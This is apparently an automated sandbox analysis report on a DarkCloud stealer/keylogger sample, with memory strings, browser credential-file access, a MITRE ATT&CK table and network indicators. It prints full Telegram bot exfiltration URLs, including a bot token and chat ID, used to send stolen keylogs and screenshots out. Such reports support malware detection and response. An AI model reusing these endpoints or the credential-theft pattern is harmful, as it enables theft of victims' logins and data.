            Source: KeyDatakmrNhWWq.txt.1.drBinary or memory string: [07:40:57]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:48]<<Program Manager>>
            Source: KeyDatafTuSdKgn.txt.1.drBinary or memory string: [07:41:08]<<Program Manager>>
            Source: KeyDataUNbfPUtV.txt.1.drBinary or memory string: [07:41:19]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:04]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:55]<<Program Manager>[
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:10]<<Program Manager>>
            Source: KeyDataXAbtkbVC.txt.1.drBinary or memory string: [07:40:37]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:59]<<Program Manager>>
            Source: KeyDataQBoKXMWe.txt.1.drBinary or memory string: [07:40:48]<<Program Manager>>
            Source: KeyDatakmrNhWWq.txt.1.drBinary or memory string: [07:40:59]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003328000.00000004.00000020.00020000.00000000.sdmp, KeyDataaUlOfcDD.txt.1.drBinary or memory string: [07:39:32]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:43]<<Program Manager>>
            Source: KeyDatafTuSdKgn.txt.1.drBinary or memory string: [07:41:09]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:54]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:56]<<Program Manager>
            Source: KeyDataKatNRXIK.txt.1.drBinary or memory string: [07:40:25]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:03]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:44]<<Program Manager>>
            Source: KeyDataQBoKXMWe.txt.1.drBinary or memory string: [07:40:47]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:11]<<Program Managern Fa(a){return a.s===M?a.toJSON():Aa(a)};function Ga(a,b,c){c=void 0===c?K:c;if(null!=a){if(ta&&a instanceof Uint8Array)return b?a:new Uint8Array(a);if(Array.isArray(a)){var d=H(a);if(d&2)return a;if(b&&!(d&64)&&(d&32||0===d))return I(a,d|34),a;a=Ea(a,Ga,d&4?K:c,!0,!1,!0);b=H(a);b&4&&b&2&&Object.freeze(a);return a}a.s===M&&(b=a.h,c=J(b),a=c&2?a:Q(a.constructor,Ha(b,c,!0)));return a}}function Ha(a,b,c){var d=c||b&2?K:xa,e=!!(b&32);a=Ba(a,b,function(f){return Ga(f,e,d)});G(a,32|(c?2:0));return a};function Ia(a,b){a=a.h;return Ja(a,J(a),b)}function Ja(a,b,c,d){if(-1===c)return null;if(c>=L(b)){if(b&256)return a[a.length-1][c]}else{var e=a.length;if(d&&b&256&&(d=a[e-1][c],null!=d))return d;b=c+((b>>9&1)-1);if(b<e)return a[b]}}function Ka(a,b,c,d,e){var f=L(b);if(c>=f||e){e=b;if(b&256)f=a[a.length-1];else{if(null==d)return;f=a[f+((b>>9&1)-1)]={};e|=256}f[c]=d;e&=-1025;e!==b&&I(a,e)}else a[c+((b>>9&1)-1)]=d,b&256&&(d=a[a.length-1],c in d&&delete d[c]),b&1024&&I(a,b&-1025)}
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:52]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:58]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:11]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:06]<<Program Manager>>
            Source: KeyDatafTuSdKgn.txt.1.drBinary or memory string: [07:41:17]<<Program Manager>>
            Source: KeyDataUNbfPUtV.txt.1.drBinary or memory string: [07:41:20]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:53]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:57]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:02]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:49]<<Program Manager>>
            Source: KeyDataQBoKXMWe.txt.1.drBinary or memory string: [07:40:46]<<Program Manager>>
            Source: KeyDataKatNRXIK.txt.1.drBinary or memory string: [07:40:24]<<Program Manager>>

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: wMy37vlfvz.exe, type: SAMPLE
            Source: Yara matchFile source: 1.0.wMy37vlfvz.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000000.2349408415.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wMy37vlfvz.exe PID: 4304, type: MEMORYSTR
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: Process Memory Space: wMy37vlfvz.exe PID: 4304, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: wMy37vlfvz.exe, type: SAMPLE
            Source: Yara matchFile source: 1.0.wMy37vlfvz.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000000.2349408415.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wMy37vlfvz.exe PID: 4304, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            2
            Process Injection
            2
            Process Injection
            1
            OS Credential Dumping
            1
            Security Software Discovery
            Remote Services1
            Data from Local System
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            DLL Side-Loading
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
            Application Window Discovery
            SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
            System Network Configuration Discovery
            Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
            System Information Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            wMy37vlfvz.exe66%ReversingLabsWin32.Trojan.DarkCloud
            wMy37vlfvz.exe100%AviraTR/Dropper.Gen
            wMy37vlfvz.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            showip.net
            162.55.60.2
            truefalse
              high
              s-part-0035.t-0009.t-msedge.net
              13.107.246.63
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75false
                    high
                    https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ac.ecosia.org/autocomplete?q=wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://api.telegram.org/cZwMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/chrome_newtabwMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://schema.orgwMy37vlfvz.exe, 00000001.00000003.2422426682.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419621797.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/ac/?q=wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icowMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/botwMy37vlfvz.exefalse
                                        high
                                        https://showip.net/wMy37vlfvz.exe, 00000001.00000003.2422426682.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419621797.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://www.openstreetmap.org/copyrightwMy37vlfvz.exe, 00000001.00000003.2422426682.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419621797.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://unpkg.com/leafletwMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.telegram.org/wAwMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.maxmind.comwMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://showip.net/?checkip=wMy37vlfvz.exe, 00000001.00000003.2422426682.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419621797.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.ecosia.org/newtab/wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.telegram.org/IlDwMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUfalse
                                                                  162.55.60.2
                                                                  showip.netUnited States
                                                                  35893ACPCAfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1562297
                                                                  Start date and time:2024-11-25 13:38:13 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 5m 10s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:6
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:wMy37vlfvz.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:16efabc49c172527044fbf2015d1f48531cfb7b306b98fcd5c6fc16b38c68da0.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.winEXE@2/19@2/2
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: wMy37vlfvz.exe
                                                                  TimeTypeDescription
                                                                  07:39:56API Interceptor4877x Sleep call for process: wMy37vlfvz.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.220dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                      order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                        NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                          MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                              Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    DESIGN LOGO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      162.55.60.28m65n7ieJC.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      Factura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      Pago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • showip.net/
                                                                                      Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • showip.net/
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • showip.net/
                                                                                      FCGF98760900.bat.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      7rxE4s9EEG.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      showip.net8m65n7ieJC.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      Factura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      Pago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 162.55.60.2
                                                                                      Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 162.55.60.2
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 162.55.60.2
                                                                                      FCGF98760900.bat.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      7rxE4s9EEG.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      s-part-0035.t-0009.t-msedge.netVendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 13.107.246.63
                                                                                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 13.107.246.63
                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                      • 13.107.246.63
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 13.107.246.63
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.63
                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                      • 13.107.246.63
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 13.107.246.63
                                                                                      XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                      • 13.107.246.63
                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                      • 13.107.246.63
                                                                                      file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 13.107.246.63
                                                                                      api.telegram.orgdekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TELEGRAMRUdekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                      • 149.154.167.99
                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                      • 149.154.167.99
                                                                                      order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      ACPCATAX INVOICE.exeGet hashmaliciousFormBookBrowse
